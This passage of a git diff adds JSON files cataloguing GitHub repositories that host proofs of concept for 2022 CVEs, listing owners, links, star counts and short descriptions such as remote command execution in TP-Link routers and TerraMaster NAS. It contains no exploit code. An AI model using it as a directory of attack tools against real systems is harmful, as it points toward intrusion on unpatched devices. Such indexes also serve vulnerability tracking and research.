"pumpkinpiteam", + "id": 128508216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128508216?v=4", + "html_url": "https:\/\/github.com\/pumpkinpiteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pumpkinpiteam\/CVE-2022-24716", + "description": null, + "fork": false, + "created_at": "2023-03-26T01:03:07Z", + "updated_at": "2023-03-26T01:04:33Z", + "pushed_at": "2023-03-26T01:04:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 619372624, + "name": "CVE-2022-24716", + "full_name": "doosec101\/CVE-2022-24716", + "owner": { + "login": "doosec101", + "id": 128431701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128431701?v=4", + "html_url": "https:\/\/github.com\/doosec101", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/doosec101\/CVE-2022-24716", + "description": "Arbitrary File Disclosure Vulnerability in Icinga Web 2 <2.8.6, <2.9.6, <2.10", + "fork": false, + "created_at": "2023-03-27T02:22:23Z", + "updated_at": "2023-04-24T21:26:44Z", + "pushed_at": "2023-03-27T02:47:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 643308038, + "name": "CVE-2022-24716", + "full_name": "antisecc\/CVE-2022-24716", + "owner": { + "login": "antisecc", + "id": 92209707, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92209707?v=4", + "html_url": "https:\/\/github.com\/antisecc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/antisecc\/CVE-2022-24716", + "description": null, + "fork": false, + "created_at": "2023-05-20T18:43:46Z", + "updated_at": "2023-05-20T18:50:20Z", + "pushed_at": "2023-05-20T18:50:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24760.json b/2022/CVE-2022-24760.json new file mode 100644 index 0000000000..6be1491a71 --- /dev/null +++ b/2022/CVE-2022-24760.json @@ -0,0 +1,33 @@ +[ + { + "id": 476210430, + "name": "CVE-2022-24760", + "full_name": "tuo4n8\/CVE-2022-24760", + "owner": { + "login": "tuo4n8", + "id": 21272757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21272757?v=4", + "html_url": "https:\/\/github.com\/tuo4n8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tuo4n8\/CVE-2022-24760", + "description": null, + "fork": false, + "created_at": "2022-03-31T08:06:36Z", + "updated_at": "2023-07-13T09:42:38Z", + "pushed_at": "2022-03-31T08:10:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24780.json b/2022/CVE-2022-24780.json new file mode 100644 index 0000000000..7611d5db50 --- /dev/null +++ b/2022/CVE-2022-24780.json @@ -0,0 +1,39 @@ +[ + { + "id": 531831189, + "name": "exploit-CVE-2022-24780", + "full_name": "Acceis\/exploit-CVE-2022-24780", + "owner": { + "login": "Acceis", + "id": 34159431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34159431?v=4", + "html_url": "https:\/\/github.com\/Acceis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Acceis\/exploit-CVE-2022-24780", + "description": "iTop < 2.7.6 - (Authenticated) Remote command execution", + "fork": false, + "created_at": "2022-09-02T07:46:36Z", + "updated_at": "2024-08-12T20:26:41Z", + "pushed_at": "2022-09-02T07:48:18Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-24780", + "exploit", + "rce", + "ssti" + ], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24818.json b/2022/CVE-2022-24818.json new file mode 100644 index 0000000000..3888387d64 --- /dev/null +++ b/2022/CVE-2022-24818.json @@ -0,0 +1,40 @@ +[ + { + "id": 780425505, + "name": "CVE-2022-24818", + "full_name": "mbadanoiu\/CVE-2022-24818", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-24818", + "description": "CVE-2022-24818: Java Deserialization via Unchecked JNDI Lookups in GeoServer and GeoTools", + "fork": false, + "created_at": "2024-04-01T13:06:31Z", + "updated_at": "2024-04-01T16:48:19Z", + "pushed_at": "2024-04-01T16:45:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2022-24818", + "cves", + "deserialization", + "remote-code-execution" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24834.json b/2022/CVE-2022-24834.json new file mode 100644 index 0000000000..5be251cabb --- /dev/null +++ b/2022/CVE-2022-24834.json @@ -0,0 +1,64 @@ +[ + { + "id": 672017875, + "name": "CVE-2022-24834", + "full_name": "convisolabs\/CVE-2022-24834", + "owner": { + "login": "convisolabs", + "id": 92468795, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92468795?v=4", + "html_url": "https:\/\/github.com\/convisolabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/convisolabs\/CVE-2022-24834", + "description": null, + "fork": false, + "created_at": "2023-07-28T17:42:33Z", + "updated_at": "2024-08-19T08:56:47Z", + "pushed_at": "2023-07-28T17:54:59Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 22, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 844114285, + "name": "CVE-2022-24834-", + "full_name": "DukeSec97\/CVE-2022-24834-", + "owner": { + "login": "DukeSec97", + "id": 59002589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59002589?v=4", + "html_url": "https:\/\/github.com\/DukeSec97", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DukeSec97\/CVE-2022-24834-", + "description": null, + "fork": false, + "created_at": "2024-08-18T12:33:36Z", + "updated_at": "2024-08-18T12:39:19Z", + "pushed_at": "2024-08-18T12:39:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24934.json b/2022/CVE-2022-24934.json index 66ec3c4e0d..b8d130b148 100644 --- a/2022/CVE-2022-24934.json +++ b/2022/CVE-2022-24934.json @@ -1,4 +1,66 @@ [ + { + "id": 473965328, + "name": "CVE-2022-24934", + "full_name": "nanaao\/CVE-2022-24934", + "owner": { + "login": "nanaao", + "id": 77666853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77666853?v=4", + "html_url": "https:\/\/github.com\/nanaao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanaao\/CVE-2022-24934", + "description": " CVE-2022-24934", + "fork": false, + "created_at": "2022-03-25T10:29:35Z", + "updated_at": "2024-08-12T20:21:50Z", + "pushed_at": "2022-03-25T07:19:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 475017381, + "name": "WPS-CVE-2022-24934", + "full_name": "ASkyeye\/WPS-CVE-2022-24934", + "owner": { + "login": "ASkyeye", + "id": 50972716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50972716?v=4", + "html_url": "https:\/\/github.com\/ASkyeye", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ASkyeye\/WPS-CVE-2022-24934", + "description": "Fake WPS Update Server PoC", + "fork": false, + "created_at": "2022-03-28T13:35:37Z", + "updated_at": "2022-06-19T08:49:27Z", + "pushed_at": "2022-03-28T12:23:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, { "id": 476247545, "name": "CVE-2022-24934", diff --git a/2022/CVE-2022-24990.json b/2022/CVE-2022-24990.json index 1f73b314da..b8126cca84 100644 --- a/2022/CVE-2022-24990.json +++ b/2022/CVE-2022-24990.json @@ -1,4 +1,66 @@ [ + { + "id": 467319862, + "name": "CVE-2022-24990-TerraMaster-TOS--PHP-", + "full_name": "Jaky5155\/CVE-2022-24990-TerraMaster-TOS--PHP-", + "owner": { + "login": "Jaky5155", + "id": 47801640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47801640?v=4", + "html_url": "https:\/\/github.com\/Jaky5155", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jaky5155\/CVE-2022-24990-TerraMaster-TOS--PHP-", + "description": "CVE-2022-24990:TerraMaster TOS 通过 PHP 对象实例化执行未经身份验证的远程命令", + "fork": false, + "created_at": "2022-03-08T01:28:32Z", + "updated_at": "2022-03-09T01:57:51Z", + "pushed_at": "2022-03-08T01:40:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468177153, + "name": "CVE-2022-24990-POC", + "full_name": "VVeakee\/CVE-2022-24990-POC", + "owner": { + "login": "VVeakee", + "id": 85714114, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85714114?v=4", + "html_url": "https:\/\/github.com\/VVeakee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VVeakee\/CVE-2022-24990-POC", + "description": "仅仅是poc,并不是exp", + "fork": false, + "created_at": "2022-03-10T03:16:04Z", + "updated_at": "2024-11-16T19:54:24Z", + "pushed_at": "2022-03-15T12:58:09Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, { "id": 471885760, "name": "CVE-2022-24990", @@ -30,6 +92,37 @@ "score": 0, "subscribers_count": 3 }, + { + "id": 471886733, + "name": "CVE-2022-24990", + "full_name": "lishang520\/CVE-2022-24990", + "owner": { + "login": "lishang520", + "id": 60433249, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60433249?v=4", + "html_url": "https:\/\/github.com\/lishang520", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lishang520\/CVE-2022-24990", + "description": "CVE-2022-24990信息泄露+RCE 一条龙", + "fork": false, + "created_at": "2022-03-20T05:21:08Z", + "updated_at": "2024-09-10T06:24:04Z", + "pushed_at": "2022-03-29T11:03:22Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 39, + "score": 0, + "subscribers_count": 4 + }, { "id": 480629331, "name": "CVE-2022-24990", @@ -60,5 +153,36 @@ "watchers": 3, "score": 0, "subscribers_count": 1 + }, + { + "id": 552773170, + "name": "terraMaster-CVE-2022-24990", + "full_name": "jsongmax\/terraMaster-CVE-2022-24990", + "owner": { + "login": "jsongmax", + "id": 54309806, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54309806?v=4", + "html_url": "https:\/\/github.com\/jsongmax", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jsongmax\/terraMaster-CVE-2022-24990", + "description": null, + "fork": false, + "created_at": "2022-10-17T07:54:13Z", + "updated_at": "2023-11-21T01:52:22Z", + "pushed_at": "2022-10-17T08:12:33Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-24992.json b/2022/CVE-2022-24992.json new file mode 100644 index 0000000000..1fe42bb508 --- /dev/null +++ b/2022/CVE-2022-24992.json @@ -0,0 +1,33 @@ +[ + { + "id": 665143568, + "name": "CVE-2022-24992", + "full_name": "n0lsecurity\/CVE-2022-24992", + "owner": { + "login": "n0lsecurity", + "id": 91031441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91031441?v=4", + "html_url": "https:\/\/github.com\/n0lsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n0lsecurity\/CVE-2022-24992", + "description": "CVE-2022–24992", + "fork": false, + "created_at": "2023-07-11T14:26:58Z", + "updated_at": "2023-07-11T14:26:59Z", + "pushed_at": "2023-07-11T14:28:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25012.json b/2022/CVE-2022-25012.json new file mode 100644 index 0000000000..ce4f39ff23 --- /dev/null +++ b/2022/CVE-2022-25012.json @@ -0,0 +1,33 @@ +[ + { + "id": 622083074, + "name": "CVE-2022-25012", + "full_name": "s3l33\/CVE-2022-25012", + "owner": { + "login": "s3l33", + "id": 60675004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60675004?v=4", + "html_url": "https:\/\/github.com\/s3l33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s3l33\/CVE-2022-25012", + "description": "Updated version of this weak password encryption script", + "fork": false, + "created_at": "2023-04-01T04:21:18Z", + "updated_at": "2024-08-08T03:48:16Z", + "pushed_at": "2023-04-01T04:38:18Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25018.json b/2022/CVE-2022-25018.json new file mode 100644 index 0000000000..4b99f145bb --- /dev/null +++ b/2022/CVE-2022-25018.json @@ -0,0 +1,33 @@ +[ + { + "id": 463453899, + "name": "CVE-2022-25018", + "full_name": "MoritzHuppert\/CVE-2022-25018", + "owner": { + "login": "MoritzHuppert", + "id": 35614875, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35614875?v=4", + "html_url": "https:\/\/github.com\/MoritzHuppert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MoritzHuppert\/CVE-2022-25018", + "description": null, + "fork": false, + "created_at": "2022-02-25T08:23:49Z", + "updated_at": "2023-10-10T01:13:05Z", + "pushed_at": "2022-02-25T09:06:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25020.json b/2022/CVE-2022-25020.json new file mode 100644 index 0000000000..ae2685fef3 --- /dev/null +++ b/2022/CVE-2022-25020.json @@ -0,0 +1,33 @@ +[ + { + "id": 463454154, + "name": "CVE-2022-25020", + "full_name": "MoritzHuppert\/CVE-2022-25020", + "owner": { + "login": "MoritzHuppert", + "id": 35614875, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35614875?v=4", + "html_url": "https:\/\/github.com\/MoritzHuppert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MoritzHuppert\/CVE-2022-25020", + "description": null, + "fork": false, + "created_at": "2022-02-25T08:24:44Z", + "updated_at": "2022-11-09T18:15:24Z", + "pushed_at": "2022-02-25T09:06:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25022.json b/2022/CVE-2022-25022.json new file mode 100644 index 0000000000..f03a9f63ed --- /dev/null +++ b/2022/CVE-2022-25022.json @@ -0,0 +1,33 @@ +[ + { + "id": 463454611, + "name": "CVE-2022-25022", + "full_name": "MoritzHuppert\/CVE-2022-25022", + "owner": { + "login": "MoritzHuppert", + "id": 35614875, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35614875?v=4", + "html_url": "https:\/\/github.com\/MoritzHuppert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MoritzHuppert\/CVE-2022-25022", + "description": null, + "fork": false, + "created_at": "2022-02-25T08:26:12Z", + "updated_at": "2022-11-09T18:15:24Z", + "pushed_at": "2022-02-25T09:06:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25060.json b/2022/CVE-2022-25060.json new file mode 100644 index 0000000000..a4eeb17fcd --- /dev/null +++ b/2022/CVE-2022-25060.json @@ -0,0 +1,33 @@ +[ + { + "id": 463683132, + "name": "CVE-2022-25060", + "full_name": "exploitwritter\/CVE-2022-25060", + "owner": { + "login": "exploitwritter", + "id": 47488127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47488127?v=4", + "html_url": "https:\/\/github.com\/exploitwritter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploitwritter\/CVE-2022-25060", + "description": "This script exploits a remote command execution vulnerability under the oal_startPing component in the TPLink WR840N router.", + "fork": false, + "created_at": "2022-02-25T21:42:01Z", + "updated_at": "2022-03-08T02:54:26Z", + "pushed_at": "2022-02-25T21:43:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25061.json b/2022/CVE-2022-25061.json new file mode 100644 index 0000000000..18f943ffd6 --- /dev/null +++ b/2022/CVE-2022-25061.json @@ -0,0 +1,33 @@ +[ + { + "id": 463678168, + "name": "CVE-2022-25061", + "full_name": "exploitwritter\/CVE-2022-25061", + "owner": { + "login": "exploitwritter", + "id": 47488127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47488127?v=4", + "html_url": "https:\/\/github.com\/exploitwritter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploitwritter\/CVE-2022-25061", + "description": "This script exploits a remote command execution vulnerability under the oal_setIp6DefaultRoute component in the TPLink WR840N router.", + "fork": false, + "created_at": "2022-02-25T21:18:11Z", + "updated_at": "2022-03-08T02:54:47Z", + "pushed_at": "2022-02-25T21:38:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25062.json b/2022/CVE-2022-25062.json new file mode 100644 index 0000000000..a83b55b516 --- /dev/null +++ b/2022/CVE-2022-25062.json @@ -0,0 +1,33 @@ +[ + { + "id": 463687842, + "name": "CVE-2022-25062", + "full_name": "exploitwritter\/CVE-2022-25062", + "owner": { + "login": "exploitwritter", + "id": 47488127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47488127?v=4", + "html_url": "https:\/\/github.com\/exploitwritter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploitwritter\/CVE-2022-25062", + "description": "This script exploits a vulnerability (IoF) in the TPLink WR840N router, using a field for injecting code in the module DNS.", + "fork": false, + "created_at": "2022-02-25T22:04:41Z", + "updated_at": "2022-03-08T02:54:11Z", + "pushed_at": "2022-02-25T22:07:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25063.json b/2022/CVE-2022-25063.json new file mode 100644 index 0000000000..3d09aa9031 --- /dev/null +++ b/2022/CVE-2022-25063.json @@ -0,0 +1,33 @@ +[ + { + "id": 463690604, + "name": "CVE-2022-25063", + "full_name": "exploitwritter\/CVE-2022-25063", + "owner": { + "login": "exploitwritter", + "id": 47488127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47488127?v=4", + "html_url": "https:\/\/github.com\/exploitwritter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploitwritter\/CVE-2022-25063", + "description": "This script exploits a vulnerability (XSS) in the TPLink WR840N router, using a field for injecting javascript code.", + "fork": false, + "created_at": "2022-02-25T22:18:55Z", + "updated_at": "2022-03-08T02:53:48Z", + "pushed_at": "2022-02-25T22:19:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25064.json b/2022/CVE-2022-25064.json new file mode 100644 index 0000000000..9c6daa8431 --- /dev/null +++ b/2022/CVE-2022-25064.json @@ -0,0 +1,64 @@ +[ + { + "id": 463693563, + "name": "CVE-2022-25064", + "full_name": "exploitwritter\/CVE-2022-25064", + "owner": { + "login": "exploitwritter", + "id": 47488127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47488127?v=4", + "html_url": "https:\/\/github.com\/exploitwritter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploitwritter\/CVE-2022-25064", + "description": "This script exploits a remote command execution vulnerability in the TPLink WR840N router, using the configure function IPv6 protocol.", + "fork": false, + "created_at": "2022-02-25T22:34:38Z", + "updated_at": "2022-03-08T02:53:01Z", + "pushed_at": "2022-02-25T22:38:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 464942561, + "name": "CVE-2022-25064", + "full_name": "Mr-xn\/CVE-2022-25064", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2022-25064", + "description": null, + "fork": false, + "created_at": "2022-03-01T15:10:20Z", + "updated_at": "2024-08-12T20:21:07Z", + "pushed_at": "2022-03-05T01:02:42Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 21, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25257.json b/2022/CVE-2022-25257.json new file mode 100644 index 0000000000..7b76abf0b9 --- /dev/null +++ b/2022/CVE-2022-25257.json @@ -0,0 +1,64 @@ +[ + { + "id": 461406728, + "name": "CVE-2022-25257", + "full_name": "polling-repo-continua\/CVE-2022-25257", + "owner": { + "login": "polling-repo-continua", + "id": 68729769, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68729769?v=4", + "html_url": "https:\/\/github.com\/polling-repo-continua", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/polling-repo-continua\/CVE-2022-25257", + "description": null, + "fork": false, + "created_at": "2022-02-20T06:42:24Z", + "updated_at": "2022-02-23T15:48:49Z", + "pushed_at": "2022-02-17T13:54:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 467043457, + "name": "CVE-2022-25257", + "full_name": "RobertDra\/CVE-2022-25257", + "owner": { + "login": "RobertDra", + "id": 68341018, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68341018?v=4", + "html_url": "https:\/\/github.com\/RobertDra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RobertDra\/CVE-2022-25257", + "description": null, + "fork": false, + "created_at": "2022-03-07T10:19:20Z", + "updated_at": "2022-03-07T10:19:20Z", + "pushed_at": "2022-03-07T10:19:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25258.json b/2022/CVE-2022-25258.json new file mode 100644 index 0000000000..108295b5c2 --- /dev/null +++ b/2022/CVE-2022-25258.json @@ -0,0 +1,33 @@ +[ + { + "id": 459503187, + "name": "d-os-descriptor", + "full_name": "szymonh\/d-os-descriptor", + "owner": { + "login": "szymonh", + "id": 12231135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12231135?v=4", + "html_url": "https:\/\/github.com\/szymonh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/szymonh\/d-os-descriptor", + "description": "CVE-2022-25258 - Demo exploit targeting usb gadget's os descriptor handler", + "fork": false, + "created_at": "2022-02-15T09:04:25Z", + "updated_at": "2022-02-17T08:51:30Z", + "pushed_at": "2022-02-16T20:40:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25260.json b/2022/CVE-2022-25260.json new file mode 100644 index 0000000000..3795c1a8b4 --- /dev/null +++ b/2022/CVE-2022-25260.json @@ -0,0 +1,41 @@ +[ + { + "id": 531686651, + "name": "CVE-2022-25260", + "full_name": "yuriisanin\/CVE-2022-25260", + "owner": { + "login": "yuriisanin", + "id": 11749007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11749007?v=4", + "html_url": "https:\/\/github.com\/yuriisanin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuriisanin\/CVE-2022-25260", + "description": "PoC for CVE-2022-25260: pre-auth semi-blind SSRF in JetBrains Hub", + "fork": false, + "created_at": "2022-09-01T21:08:19Z", + "updated_at": "2024-08-12T20:26:41Z", + "pushed_at": "2022-09-01T21:14:47Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-25260", + "exploit", + "jetbrains", + "jetbrains-hub", + "ssrf", + "vulnerability" + ], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25265.json b/2022/CVE-2022-25265.json new file mode 100644 index 0000000000..0bc5d97ae5 --- /dev/null +++ b/2022/CVE-2022-25265.json @@ -0,0 +1,39 @@ +[ + { + "id": 459999417, + "name": "exec-prot-bypass", + "full_name": "x0reaxeax\/exec-prot-bypass", + "owner": { + "login": "x0reaxeax", + "id": 61374847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61374847?v=4", + 